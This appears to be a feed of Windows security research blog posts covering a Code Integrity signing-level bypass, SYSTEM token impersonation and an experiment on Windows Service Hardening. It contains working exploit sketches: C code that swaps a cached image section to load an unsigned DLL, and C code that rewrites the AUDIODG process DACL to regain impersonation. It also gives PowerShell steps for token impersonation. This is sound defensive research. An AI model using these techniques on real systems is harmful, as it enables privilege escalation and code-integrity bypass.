The code is using the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to get the kernel's Code Integrity module to check the signing level. The signing level must be at least level 8, passed in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know: a Microsoft signed DLL loads but a signed non-Microsoft one doesn't, as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?
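
Here's a rough, untested sketch of steps 1 to 5 using documented Win32 APIs. All paths are placeholders, differences in file size between the two DLLs are glossed over, and step 6 still needs the hooked process creation described earlier; whether the loader then reuses the cached image section is exactly the behaviour being abused.

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Step 1: copy the unsigned redirection DLL to a temporary file (placeholder paths).
    if (!CopyFileW(L"C:\\path\\unsigned_redirect.dll", L"C:\\temp\\redirect.tmp", FALSE))
        return 1;

    // Step 2: open the temporary file for read/write/execute access.
    HANDLE file = CreateFileW(L"C:\\temp\\redirect.tmp",
        GENERIC_READ | GENERIC_WRITE | GENERIC_EXECUTE,
        FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (file == INVALID_HANDLE_VALUE)
        return 1;

    // Step 3: create an image section for the file and map a view. This caches
    // the current (unsigned) contents in the file's image section object.
    HANDLE section = CreateFileMappingW(file, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    PVOID view = section ? MapViewOfFile(section, FILE_MAP_READ, 0, 0, 0) : NULL;
    if (!view)
        return 1;

    // Step 4: rewrite the file on disk with the contents of a Microsoft signed
    // DLL so the load-time signing level check passes (signed DLL name is a placeholder).
    HANDLE signed_dll = CreateFileW(L"C:\\Windows\\System32\\signed_example.dll",
        GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    BYTE buf[4096];
    DWORD bytes_read = 0, bytes_written = 0;
    SetFilePointer(file, 0, NULL, FILE_BEGIN);
    while (ReadFile(signed_dll, buf, sizeof(buf), &bytes_read, NULL) && bytes_read > 0)
        WriteFile(file, buf, bytes_read, &bytes_written, NULL);
    CloseHandle(signed_dll);

    // Step 5: close the file and section handles but keep the view mapped so
    // the cached image section survives.
    CloseHandle(section);
    CloseHandle(file);

    // Step 6: start the target with the temporary file named in
    // RTL_USER_PROCESS_PARAMETERS as described earlier (not shown here).
    printf("Cached image view at %p, press enter when done...\n", view);
    getchar();
    return 0;
}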

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

By: tiraniddo
30 January 2020 at 06:40
This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

Impersonation flowchart, showing that there's an Origin Session Check.

Actually this diagram isn't exactly like the one I've shown before; I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

if (proctoken->AuthenticationId == imptoken->OriginatingLogonSession) {
    return STATUS_SUCCESS;
}

The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

PS> Start-Win32ChildProcess powershell

Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

PS> $(Get-NtToken -Pseduo).AuthenticationId

LowPart HighPart
------- --------
    999        0

Next remove SeImpersonatePrivilege from the Token:

PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

Now pick a normal user token, say from Explorer and dump the Origin.

PS> $p = Get-NtProcess -Name explorer.exe
PS> $t = Get-NtToken -Process $p -Duplicate
PS> $t.Origin

LowPart HighPart
------- --------
    999        0

As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Impersonation

We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

PS> $t = Get-NtToken -Duplicate
PS> Set-NtTokenIntegrityLevel High
PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Identification

As we can see, the level has been set to Identification. If SeImpersonatePrivilege had been doing the work we'd have been able to impersonate the higher IL token as well, since the privilege check happens before the IL check.

Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if SeImpersonatePrivilege has been stripped away. This should work even for AppContainer or restricted tokens as the check for sandbox tokens happens after the session check.

The take away from this blog should be:

  • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
  • Never try to create a sandboxed process which uses SYSTEM as the base token, as you can probably circumvent all manner of security checks including impersonation.



Uncovering Mimikatz 'msv' and collecting credentials through PyKD

20 January 2020 at 00:00
Preface All the value that a tool such as mimikatz provides in extracting Windows credentials from memory resides in every pentester’s heart and guts. It is so resilient and flexible that it has quickly become the de facto standard in credential dumping and we cannot thank Benjamin Delpy enough for the immense quality work that has been done in recent years. Since the code is open source, I recently decided to take up the not-so-leisurely hobby of understanding the mimikatz codebase.

Dumping DPC Queues: Adventures in HIGH_LEVEL IRQL

17 January 2020 at 23:30
This post is part of the Practical Reverse Engineering Exercises series. To understand more about the basics of DPCs, read Reversing KeInsertQueueDpc (source code below). Exercise: Write a driver to enumerate all DPCs on the entire system. Make sure you support multi-processor systems! Explain the difficulties and how you solved them. Sounds fun! Let’s start. I thought about dividing this post into 2 posts, but nah. Using Undocumented APIs in Windows First of all, we need to understand that accessing the DPC queue from a real product is an extremely bad idea because it’s a pretty undocumented data structure.

Reversing DPC: KeInsertQueueDpc

5 January 2020 at 19:33
Exercise: Explain how the following functions work: KeInsertQueueDpc, KiRetireDpcList, KiExecuteDpc, and KiExecuteAllDpcs. If you feel like an overachiever, decompile those functions from the x86 and x64 assemblies and explain the differences. If I want to explain the complete solution I’ll have to divide this exercise into 2 posts. The first post is pretty simple: we are going to reverse engineer KeInsertQueueDpc. In future posts we’ll continue exploring DPCs and we will write code that dumps the DPC queues.

Empirically Assessing Windows Service Hardening

By: tiraniddo
2 January 2020 at 02:26
In the past few years there have been numerous exploits for service to SYSTEM privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is that given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discoverers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS do go and fix them silently, making it unclear whether they care or not.

Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

That's not to say there haven't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeam, Ilias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you probably should read up on one of the write-ups (the NCC one here) but the gist is, the Update Orchestrator Service has a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones, have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary, giving a direct service to SYSTEM privilege escalation.

That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges, as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference: Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

"Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, as the resource being written to might be uninteresting; however as a proxy this is sufficient, since the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

WSH Details

Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

Limited Service Accounts and Reduced Privilege

This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts' introduction there were only two ways of configuring the user for a system service on Windows: either use the fully privileged SYSTEM account or create a local/domain user which has the "Log on as a Service" right. The two accounts were introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts, which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909; they are both assigned the following groups*:

BUILTIN\Users
CONSOLE LOGON
Everyone
LOCAL
NT AUTHORITY\Authenticated Users
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

* Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeSystemTimePrivilege†
SeTimeZonePrivilege
SeUndockPrivilege

† NETWORK SERVICE doesn't have SeSystemTimePrivilege.

The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.

What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters for domain joined machines; standalone machines would not share the computer account with anyone else.

Per-Service SID

The first big addition in WSH was the Per-Service SID. This SID is automatically added by the SCM to the default group list shown previously when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can be disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.
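
If you want to confirm the derived value for yourself without computing the hash, one easy way is to let LSA resolve the virtual account name. A small sketch, using the CDPSvc example from above:

#include <windows.h>
#include <sddl.h>
#include <stdio.h>

#pragma comment(lib, "advapi32.lib")

int main(void)
{
    BYTE sid[SECURITY_MAX_SID_SIZE];
    DWORD sid_size = sizeof(sid);
    WCHAR domain[256];
    DWORD domain_size = ARRAYSIZE(domain);
    SID_NAME_USE use;
    LPWSTR sid_string = NULL;

    // Resolve the virtual account name to its derived per-service SID.
    if (!LookupAccountNameW(NULL, L"NT SERVICE\\CDPSvc", sid, &sid_size,
                            domain, &domain_size, &use))
        return 1;

    // Should print the S-1-5-80-... value shown above.
    if (ConvertSidToStringSidW(sid, &sid_string)) {
        wprintf(L"%s\n", sid_string);
        LocalFree(sid_string);
    }
    return 0;
}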

Of course it's up to the service to actually ACL its resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

- Type  : Allowed
- Name  : NT AUTHORITY\SYSTEM
- Access: Full Access

- Type  : Allowed
- Name  : OWNER RIGHTS
- Access: ReadControl

- Type  : Allowed
- Name  : NT SERVICE\CDPSvc
- Access: Full Access

The first and third entries grant SYSTEM and the service SID full access to any resource with this DACL, while the OWNER RIGHTS entry limits the owner of the resource to READ_CONTROL access only. This directly prevents one service account getting write access to the resources of another. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance.

One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all of the service SIDs in the group list and default DACL, even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703: as long as you have greater than 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

Write-Restricted Token

The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted tokens have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted whenever an access check is performed. First the access check is run on the default group list; if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied.

Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to set up correctly as they block all access equally, including reading critical files on disk. WR tokens solve the access problem by only blocking write access, leaving read and execute access alone.
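
From user mode the same kind of token can be built with the documented CreateRestrictedToken API (a wrapper over NtFilterToken) by passing the WRITE_RESTRICTED flag. The following is only a minimal sketch of the mechanism, not what the SCM does exactly; a real service token would also carry the logon session SID and per-service SID in the restricted list.

#include <windows.h>

#pragma comment(lib, "advapi32.lib")

int main(void)
{
    HANDLE proc_token = NULL, wr_token = NULL;
    BYTE everyone[SECURITY_MAX_SID_SIZE], write_restricted[SECURITY_MAX_SID_SIZE];
    DWORD size;
    SID_AND_ATTRIBUTES restricted_sids[2];

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_DUPLICATE | TOKEN_QUERY, &proc_token))
        return 1;

    size = sizeof(everyone);
    CreateWellKnownSid(WinWorldSid, NULL, everyone, &size);                       // Everyone
    size = sizeof(write_restricted);
    CreateWellKnownSid(WinWriteRestrictedCodeSid, NULL, write_restricted, &size); // WRITE RESTRICTED

    restricted_sids[0].Sid = everyone;          restricted_sids[0].Attributes = 0;
    restricted_sids[1].Sid = write_restricted;  restricted_sids[1].Attributes = 0;

    // WRITE_RESTRICTED means the restricted SID list is only consulted for
    // write access; read and execute checks behave as normal.
    if (CreateRestrictedToken(proc_token, WRITE_RESTRICTED,
                              0, NULL,          // no SIDs disabled
                              0, NULL,          // no privileges deleted
                              2, restricted_sids,
                              &wr_token)) {
        // wr_token could now be assigned to a new process or used for impersonation.
        CloseHandle(wr_token);
    }
    CloseHandle(proc_token);
    return 0;
}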

In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

Everyone
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\SERVICE_NAME

The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.

And the Rest

There are a few things which are technically part of service hardening which we won't really consider for the experiment:

The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

Experiment Procedure

On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

Step 1: Build an access token for a service which doesn't exist on the system.
Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
Step 3: Collate the results based on the type of resource and whether write access was granted.

The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
  • LOCAL SERVICE
  • LOCAL SERVICE, Write Restricted
  • NETWORK SERVICE
  • NETWORK SERVICE, Write Restricted
  • Control
We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service probably gives a trivial route to full system compromise through impersonation. We'd want to get a bigger picture however, so it'd be useful to also include Files, Registry keys and named kernel objects. These resources might not directly lead to compromise but they do give us a general idea of the maximum impact.

It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

Experiment Procedure Detail

On to the specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user; some commands will need it (such as getting access tokens), others benefit from the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019, from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability in the number of services running at any one time; there's not a lot which can be done about that. However it's expected that the result should be the same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

Creating the Access Tokens

We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

$tokens = @()
$tokens += Get-ServiceToken LocalService FakeService
$tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
$tokens += Get-ServiceToken NetworkService FakeService
$tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM, because we're on the same desktop we can just use the following command:

$tokens += Get-NtToken -Session -Duplicate

Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

Resource Checking and Result Collation

With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

First as way of example lets run checks for process and threads:

$ps = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ProcessOnly -AllowEmptyAccess
$ts = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ThreadOnly -AllowEmptyAccess

We can pass a list of tokens to the checking command; this improves performance as we only enumerate the resources once and then perform the access check for each token. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, which allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID even where we were not granted access.

Let's do the rest of the resources:

$os = Get-AccessibleObject \ -Recurse `
    -Tokens $tokens -AllowEmptyAccess
$fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
    -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
$ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
    -Tokens $tokens -AllowEmptyAccess

We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, as it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as they're probably worthy of a topic all on their own.

We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

Experiment Results

We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

Token            Writable   Writable (WR)   Total
Control          99.83%     N/A             13171
Network Service  65.00%     0.00%           300
Local Service    62.89%     0.70%           574

As we expected the control token had almost 100% of the owned resources writable by the user. However for the two service accounts, both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token: there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting, though they were ACL'ed to Everyone which is unusual.

Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

Type          LS Writable %   LS Writable   NS Writable %   NS Writable
Directory     0.28%           1             0.51%           1
Event         1.66%           6             0.51%           1
File          74.24%          268           48.72%          95
Key           22.44%          81            49.23%          96
Mutant        0.28%           1             0.51%           1
Process       0.28%           1             0.00%           0
Section       0.55%           2             0.00%           0
SymbolicLink  0.28%           1             0.51%           1
Thread        0.00%           0             0.00%           0

The clear winners, if there is such a thing, are Files and Registry Keys, which take up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account, granting WRITE_DAC access, or the inherited DACL will contain a CREATOR OWNER SID which results in an explicit access entry for the service account.

What is perhaps more interesting is the results for Processes and Threads: neither NS nor LS has any writable threads and only LS has a single writable process. The primary reason for the lack of writable threads and processes is the default DACL, which is used for new processes when an explicit DACL isn't specified. The DACL has an OWNER RIGHTS SID granted only READ_CONTROL access, so even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

<Owner>
 - Name  : NT AUTHORITY\LOCAL SERVICE

<DACL>
 - Type  : Allowed
 - Name  : NT SERVICE\Audiosrv
 - Access: Full Access

 - Type  : Allowed
 - Name  : NT AUTHORITY\Authenticated Users
 - Access: QueryLimitedInformation

The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.
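
As a rough sketch of that escalation (assuming you already know the AUDIODG PID, passed on the command line here for illustration), the WRITE_DAC open plus a DACL rewrite might look like this. A NULL DACL is used for brevity, which grants everyone full access; a real attack would set a DACL granting just your own SID.

#include <windows.h>
#include <aclapi.h>
#include <stdlib.h>

#pragma comment(lib, "advapi32.lib")

int main(int argc, char **argv)
{
    DWORD pid = (argc > 1) ? (DWORD)atoi(argv[1]) : 0;

    // Ownership (LOCAL SERVICE) implicitly grants WRITE_DAC here, since the
    // DACL doesn't contain an OWNER RIGHTS entry to take that away.
    HANDLE process = OpenProcess(WRITE_DAC, FALSE, pid);
    if (!process)
        return 1;

    // Replace the DACL with a NULL DACL so everyone gets full access.
    DWORD err = SetSecurityInfo(process, SE_KERNEL_OBJECT,
                                DACL_SECURITY_INFORMATION, NULL, NULL, NULL, NULL);
    CloseHandle(process);

    // The process can now be reopened with full access for injection, at which
    // point SeImpersonatePrivilege is back on the table.
    return err == ERROR_SUCCESS ? 0 : 1;
}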

If you look at the results, one other odd thing you'll notice is that while there are readable threads there are no readable processes. What's going on? If we look at a normal LS service process' security descriptor we see the following:

<Owner>
 - Name  : NT AUTHORITY\LogonSessionId_0_202349

<DACL>
 - Type  : Allowed
 - Name  : NT AUTHORITY\LogonSessionId_0_202349
 - Access: Full Access

 - Type  : Allowed
 - Name  : BUILTIN\Administrators
 - Access: QueryInformation|QueryLimitedInformation

We should be able to see the reason: the owner is not LS, but instead the logon session SID, which is unique per service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID; even administrators are apparently not to be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

Is there anything else interesting in the writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory each. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service accounts' DOS Device directories, the default location to start looking up drive mappings. As the accounts can write to their respective directories this gives another angle of attack: you can compromise any service process running as the same user by dropping a mapping for the C: drive and waiting for the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

Conclusions

Even though I've not run the experiment on multiple machines, at different times, with different software, I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources, which would otherwise provide trivial elevation routes, but that protection can be easily circumvented if there are appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

